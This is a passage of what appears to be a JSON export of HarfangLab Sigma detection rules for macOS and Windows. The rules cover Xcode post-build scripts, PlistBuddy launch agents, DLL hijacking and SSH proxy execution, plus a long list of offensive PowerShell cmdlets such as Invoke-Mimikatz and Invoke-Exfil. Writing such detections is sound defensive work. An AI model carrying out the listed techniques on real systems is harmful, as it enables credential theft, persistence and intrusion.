"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f0d1c4cb-e4b7-4318-b662-6747eab2e190",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093788Z",
"creation_date": "2026-03-23T11:45:34.093790Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093795Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1195/"
],
"name": "t1195_xcode_postbuild_script.yml",
"content": "title: Suspicious Programm Launched via XCode Postbuild Script\nid: f0d1c4cb-e4b7-4318-b662-6747eab2e190\ndescription: |\n Detects a suspicious program being launch by XCode.\n This can be the result of a malicious post build script being executed after the compilation of an infected XCode project.\n If an XCode project has post build scripts configured, they are run automatically by XCode after the compilation.\n Adversaries can publish XCode projects with malicious post build scripts that executes malicious code to infect users when they compile the project.\n It is recommended to investigate the children of XCode, the post build script and the origin of the project to determine whether this action was legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1195/\ndate: 2024/06/11\nmodified: 2025/02/10\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1195\n - attack.defense_evasion\n - attack.t1222.002\n - attack.collection\n - attack.t1560.001\n - attack.command_and_control\n - attack.t1105\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.InitialAccess\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection_ancestors:\n Ancestors|contains: '/Contents/MacOS/XCBBuildService'\n\n selection_descendants_lolbins:\n Image|endswith:\n - '/killall'\n - '/sleep'\n - '/launchctl'\n - '/curl'\n - '/wget'\n - '/zip'\n - '/osascript'\n - '/cat'\n - '/dscl'\n - '/mdls'\n - '/security'\n - '/sw_vers'\n - '/dscacheutil'\n - '/csrutil'\n - '/netstat'\n - '/who'\n - '/preintenv'\n - '/smbutil'\n - '/shownmount'\n - '/dseditgroup'\n - '/kcc'\n - '/mkpassdb'\n - '/dsenableroot'\n - '/ldapsearch'\n - '/nohup'\n\n selection_descendants_chmod:\n CommandLine|contains: 'chmod +x'\n\n exclusion_toolchain:\n CommandLine: '/bin/cat /Applications/Xcode*Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/share/docc/features.json'\n\n exclusion_unity:\n CommandLine|startswith: 'chmod +x 
/Users/*/Unity/'\n\n exclusion_unity2:\n CommandLine|startswith: 'chmod +x */Il2CppOutputProject/IL2CPP/build/deploy_arm64/'\n ParentCommandLine|startswith: '/bin/sh /Users/*/Library/Developer/Xcode/DerivedData/Unity-iPhone-*/Build/Intermediates.noindex/Unity-iPhone.build/ReleaseForRunning-iphoneos/GameAssembly.build/Script-*.sh/bin/sh'\n\n exclusion_flutter:\n CommandLine: 'cat */flutter/bin/cache/flutter_tools.stamp'\n\n condition: selection_ancestors and 1 of selection_descendants_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f0d1c4cb-e4b7-4318-b662-6747eab2e190",
"rule_name": "Suspicious Programm Launched via XCode Postbuild Script",
"rule_description": "Detects a suspicious program being launch by XCode.\nThis can be the result of a malicious post build script being executed after the compilation of an infected XCode project.\nIf an XCode project has post build scripts configured, they are run automatically by XCode after the compilation.\nAdversaries can publish XCode projects with malicious post build scripts that executes malicious code to infect users when they compile the project.\nIt is recommended to investigate the children of XCode, the post build script and the origin of the project to determine whether this action was legitimate.\n",
"rule_creation_date": "2024-06-11",
"rule_modified_date": "2025-02-10",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.command_and_control",
"attack.defense_evasion",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1195",
"attack.t1222.002",
"attack.t1560.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f0dd8f4a-34b8-4bcf-b96d-74a3c8cd741b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617463Z",
"creation_date": "2026-03-23T11:45:34.617465Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617469Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/threat-intelligence/clipping-silver-sparrows-wings/",
"https://attack.mitre.org/techniques/T1543/001/"
],
"name": "t1543_001_plistbuddy_add_launchagent.yml",
"content": "title: Launch Agent Created via PlistBuddy\nid: f0dd8f4a-34b8-4bcf-b96d-74a3c8cd741b\ndescription: |\n Detects a Launch Agent being created by PlistBuddy.\n PlistBuddy is a utility to easily create plist files via commandline.\n Attackers can manually craft malicious launch agents in plist files to achieve persistence.\n It is recommended to investigate the content of the plist file to determine whether this action was legitimate.\nreferences:\n - https://redcanary.com/blog/threat-intelligence/clipping-silver-sparrows-wings/\n - https://attack.mitre.org/techniques/T1543/001/\ndate: 2024/06/12\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1195\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Behavior.SystemModification\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection_plistbuddy:\n Image|contains: 'PlistBuddy'\n\n selection_launch_agent:\n CommandLine|contains: 'LaunchAgents'\n\n selection_runatload:\n CommandLine|contains:\n - 'RunAtLoad bool true'\n - 'RunAtLoad bool yes'\n\n exclusion_onedrive:\n CommandLine: '/usr/libexec/PlistBuddy -c clear dict -c Add :Label string \"com.microsoft.OneDriveStandaloneUpdater\" -c Add :ProgramArguments array -c Add :Program string \"/Applications/OneDrive.app/Contents/StandaloneUpdater.app/Contents/MacOS/OneDriveStandaloneUpdater\" -c Add :RunAtLoad bool YES -c Add :StartInterval integer 86400 /Library/LaunchAgents/com.microsoft.OneDriveStandaloneUpdater.plist'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f0dd8f4a-34b8-4bcf-b96d-74a3c8cd741b",
"rule_name": "Launch Agent Created via PlistBuddy",
"rule_description": "Detects a Launch Agent being created by PlistBuddy.\nPlistBuddy is a utility to easily create plist files from the command line.\nAttackers can manually craft malicious launch agents in plist files to achieve persistence.\nIt is recommended to investigate the content of the plist file to determine whether this action was legitimate.\n",
"rule_creation_date": "2024-06-12",
"rule_modified_date": "2025-01-28",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1195"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f0e116a0-82c7-4f59-9926-b9039668d557",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095242Z",
"creation_date": "2026-03-23T11:45:34.095244Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095248Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_driverquery.yml",
"content": "title: DLL Hijacking via driverquery.exe\nid: f0e116a0-82c7-4f59-9926-b9039668d557\ndescription: |\n Detects potential Windows DLL Hijacking via driverquery.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'driverquery.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\fastprox.dll'\n - '\\framedynos.dll'\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n - '\\version.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of 
filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f0e116a0-82c7-4f59-9926-b9039668d557",
"rule_name": "DLL Hijacking via driverquery.exe",
"rule_description": "Detects potential Windows DLL Hijacking via driverquery.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f0e577e7-880f-48f0-8935-8641065e0641",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091760Z",
"creation_date": "2026-03-23T11:45:34.091762Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091766Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wiaacmgr.yml",
"content": "title: DLL Hijacking via wiaacmgr.exe\nid: f0e577e7-880f-48f0-8935-8641065e0641\ndescription: |\n Detects potential Windows DLL Hijacking via wiaacmgr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wiaacmgr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ScanSetting.DLL'\n - '\\UxTheme.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f0e577e7-880f-48f0-8935-8641065e0641",
"rule_name": "DLL Hijacking via wiaacmgr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wiaacmgr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f0ff7dfb-0cc8-467d-9c26-c8096c156e3d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070036Z",
"creation_date": "2026-03-23T11:45:34.070038Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070043Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cyble.com/blog/a-stealthy-playbook-for-advanced-cyber-attacks/",
"https://x.com/salmanvsf/status/1901517210260062360",
"https://attack.mitre.org/techniques/T1566/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_suspicious_ssh_command.yml",
"content": "title: Suspicious SSH Command Executed\nid: f0ff7dfb-0cc8-467d-9c26-c8096c156e3d\ndescription: |\n Detects a suspicious execution of ssh.exe as a proxy to launch another application.\n This pattern is frequently observed in phishing attacks that use a malicious link file (.LNK) to deploy stealers.\n This technique can be used to bypass defensive measures.\n It is recommended to investigate the execution context and surrounding detections to assess whether the execution of ssh.exe is linked with malicious activity.\nreferences:\n - https://cyble.com/blog/a-stealthy-playbook-for-advanced-cyber-attacks/\n - https://x.com/salmanvsf/status/1901517210260062360\n - https://attack.mitre.org/techniques/T1566/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2025/03/24\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_proxycommand:\n Image|endswith:\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\pwsh.exe'\n - '\\wscript.exe'\n - '\\cscript.exe'\n - '\\rundll32.exe'\n - '\\mshta.exe'\n ParentImage: '?:\\Windows\\System32\\OpenSSH\\ssh.exe'\n ParentCommandLine|contains: 'ProxyCommand='\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n selection_localcommand:\n ParentImage: '?:\\Windows\\System32\\OpenSSH\\ssh.exe'\n ParentCommandLine|contains|all:\n - 'PermitLocalCommand=yes'\n - 'LocalCommand='\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f0ff7dfb-0cc8-467d-9c26-c8096c156e3d",
"rule_name": "Suspicious SSH Command Executed",
"rule_description": "Detects a suspicious execution of ssh.exe as a proxy to launch another application.\nThis pattern is frequently observed in phishing attacks that use a malicious link file (.LNK) to deploy stealers.\nThis technique can be used to bypass defensive measures.\nIt is recommended to investigate the execution context and surrounding detections to assess whether the execution of ssh.exe is linked with malicious activity.\n",
"rule_creation_date": "2025-03-24",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1218",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f12ef755-160a-445e-8d4a-cca0c355beca",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608396Z",
"creation_date": "2026-03-23T11:45:34.608399Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608407Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/Kevin-Robertson/Inveigh",
"https://gist.github.com/monoxgas/9d238accd969550136db",
"https://gist.github.com/HarmJ0y/c84065c0c487d4c74cc1",
"https://github.com/secmode/Invoke-Apex",
"https://github.com/Mr-Un1k0d3r/RedTeamPowershellScripts",
"https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf",
"https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Start-Eidolon.ps1",
"https://github.com/danielbohannon/Invoke-CradleCrafter",
"https://github.com/AlsidOfficial/WSUSpendu",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_malicious_cmdlet_script.yml",
"content": "title: Malicious PowerShell Commandlets\nid: f12ef755-160a-445e-8d4a-cca0c355beca\ndescription: |\n Detects various malicious commandlets in PowerShell scripts, generally associated with online repositories containing attack codes to perform memory-only attacks.\n Attackers can use off-the-shelf malicious PowerShell scripts to perform various actions on the infected hosts such as discovery, establish persistence, or exploit vulnerabilities.\n It is recommended to investigate the detected PowerShell script to look for malicious content, as well as other actions taken by the PowerShell process and its ancestors.\nreferences:\n - https://github.com/Kevin-Robertson/Inveigh\n - https://gist.github.com/monoxgas/9d238accd969550136db\n - https://gist.github.com/HarmJ0y/c84065c0c487d4c74cc1\n - https://github.com/secmode/Invoke-Apex\n - https://github.com/Mr-Un1k0d3r/RedTeamPowershellScripts\n - https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf\n - https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Start-Eidolon.ps1\n - https://github.com/danielbohannon/Invoke-CradleCrafter\n - https://github.com/AlsidOfficial/WSUSpendu\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2021/06/22\nmodified: 2025/03/03\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1059.001\n - attack.t1562.001\n - attack.t1562.006\n - attack.collection\n - attack.t1125\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.MemoryExecution\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n - 'Invoke-Inveigh'\n - 'Invoke-DCSync'\n - 'Invoke-InveighRelay'\n - 'Invoke-PsExec'\n # - 'Invoke-SSHCommand' # too many FP\n - 'Invoke-SMBScanner'\n - 'Invoke-TimeStomp'\n - 
'Invoke-Creds'\n - 'Invoke-UACBypass'\n - 'Invoke-Exfil'\n - 'Invoke-Persistence'\n - 'Invoke-Privesc'\n - 'Invoke-Obfuscation'\n - 'Invoke-AmsiBypass'\n - 'Invoke-CradleCrafter'\n - 'Take-Screenshot'\n - 'Invoke-ADPasswordBruteForce'\n - 'Remote-WmiExecute'\n - 'Remote-RegisterProtocolHandler'\n - 'timestomp'\n - 'PowerDump'\n - 'Start-Eidolon'\n - 'Out-CradleContents'\n - 'Invoke-OutCradle'\n - 'Out-Cradle'\n - 'Wsuspendu'\n - 'Invoke-Mimikatz'\n - 'VolumeShadowCopyTools'\n - 'Get-Unconstrained'\n - 'Check-VM'\n - 'Get-IndexedItem'\n - 'Invoke-RunAs'\n - 'MailRaider'\n - 'Invoke-ThunderStruck'\n - 'Invoke-VoiceTroll'\n - 'Get-SecurityPackages'\n - 'Get-RickAstley'\n - 'Find-Fruit'\n - 'HTTP-Login'\n - 'Find-TrustedDocuments'\n - 'Invoke-BadPotato'\n - 'Invoke-BetterSafetyKatz'\n - 'Invoke-Carbuncle'\n - 'Invoke-Certify'\n - 'Invoke-DAFT'\n - 'Invoke-DinvokeKatz'\n - 'Invoke-Eyewitness'\n - 'Invoke-FakeLogonScreen'\n - 'Invoke-Farmer'\n - 'Invoke-Get-RBCD-Threaded'\n - 'Invoke-Gopher'\n - 'Invoke-Grouper' # cover Invoke-GrouperX\n - 'Invoke-HandleKatz'\n - 'Invoke-Internalmonologue'\n - 'Invoke-KrbRelay'\n - 'Invoke-LdapSignCheck'\n - 'Invoke-Lockless'\n - 'Invoke-MITM6'\n - 'Invoke-MalSCCM'\n - 'Invoke-NanoDump'\n - 'Invoke-OxidResolver'\n - 'Invoke-P0wnedshell'\n - 'Invoke-PPLDump'\n - 'Invoke-Rubeus'\n - 'Invoke-SCShell'\n - 'Invoke-SafetyKatz'\n - 'Invoke-SauronEye'\n - 'Invoke-Seatbelt'\n - 'Invoke-ShadowSpray'\n - 'Invoke-SharPersist'\n - 'Invoke-SharpAllowedToAct'\n - 'Invoke-SharpBlock'\n - 'Invoke-SharpBypassUAC'\n - 'Invoke-SharpChromium'\n - 'Invoke-SharpClipboard'\n - 'Invoke-SharpCloud'\n - 'Invoke-SharpDPAPI'\n - 'Invoke-SharpDump'\n - 'Invoke-SharpGPO-RemoteAccessPolicies'\n - 'Invoke-SharpGPOAbuse'\n - 'Invoke-SharpHandler'\n - 'Invoke-SharpHide'\n - 'Invoke-SharpImpersonation'\n - 'Invoke-SharpImpersonationNoSpace'\n - 'Invoke-SharpKatz'\n - 'Invoke-SharpLdapRelayScan'\n - 'Invoke-SharpLoginPrompt'\n - 'Invoke-SharpMove'\n - 
'Invoke-SharpPrintNightmare'\n - 'Invoke-SharpPrinter'\n - 'Invoke-SharpRDP'\n - 'Invoke-SharpSCCM'\n - 'Invoke-SharpSSDP'\n - 'Invoke-SharpSecDump'\n - 'Invoke-SharpSniper'\n - 'Invoke-SharpSploit'\n - 'Invoke-SharpSpray'\n - 'Invoke-SharpStay'\n - 'Invoke-SharpUp'\n - 'Invoke-SharpWSUS'\n - 'Invoke-SharpWatson'\n - 'Invoke-Sharphound' # cover Invoke-SharpHound2, Invoke-SharpHound3,.\n - 'Invoke-Sharplocker'\n - 'Invoke-Sharpshares'\n - 'Invoke-Sharpview'\n - 'Invoke-Sharpweb'\n - 'Invoke-Snaffler'\n - 'Invoke-Spoolsample'\n - 'Invoke-StandIn'\n - 'Invoke-StickyNotesExtract'\n - 'Invoke-TotalExec'\n - 'Invoke-Thunderfox'\n - 'Invoke-Tokenvator'\n - 'Invoke-UrbanBishop'\n - 'Invoke-Whisker'\n - 'Invoke-WireTap'\n - 'Invoke-winPEAS'\n - 'Invoke-Zerologon'\n - 'Get-USBKeystrokes'\n - 'Start-WebcamRecorder'\n - 'Invoke-OfficeScrape'\n - 'Invoke-DomainPasswordSpray'\n - 'Invoke-SpraySinglePassword'\n\n exclusion_posh_ssh:\n # C:\\Program Files\\WindowsPowerShell\\Modules\\Posh-SSH\\2.2\\Posh-SSH.psd1\n # C:\\Users\\xxxx\\Documents\\WindowsPowerShell\\Modules\\Posh-SSH\\3.0.6\\Posh-SSH.psm1\n PowershellScriptPath: '*\\WindowsPowerShell\\Modules\\Posh-SSH*'\n PowershellCommand|contains:\n - 'Invoke-SSHCommandStream'\n - 'function Invoke-SSHCommand'\n\n exclusion_gehealthcare:\n # seen: modules\\utility , modules\\installpackages , modules\\deployment\n PowershellScriptPath:\n - '?:\\Program Files\\GE Healthcare\\Solution Deployer Framework\\Modules\\\\*'\n - '?:\\Program Files (x86)\\GE Healthcare\\Solution Deployer Framework\\Modules\\\\*'\n\n exclusion_sdiag:\n PowershellScriptPath: '?:\\WINDOWS\\TEMP\\SDIAG_*\\\\*.ps1'\n\n exclusion_sentinel_one:\n PowershellCommand|contains|all:\n - ':::::\\windows\\sentinel'\n - '<#sentinelbreakpoints#>'\n - 'Set-PSBreakpoint'\n\n exclusion_boxstarter:\n PowershellScriptPath: '?:\\ProgramData\\Boxstarter\\Boxstarter.Chocolatey\\Install-BoxstarterPackage.ps1'\n\n exclusion_utiladmin:\n PowershellCommand|contains|all:\n - '# Name'\n - 
': UtilAdmin-?.?.ps1'\n - '# Author'\n - ': Philippe Conseil'\n\n exclusion_agicorp:\n PowershellScriptPath: '?:\\Program Files (x86)\\AgiCorp\\\\*.ps1'\n\n exclusion_vmware_vcenter:\n PowershellCommand|contains|all:\n - 'Check-VM'\n - '-Vcenter'\n - '-Cluster'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f12ef755-160a-445e-8d4a-cca0c355beca",
"rule_name": "Malicious PowerShell Commandlets",
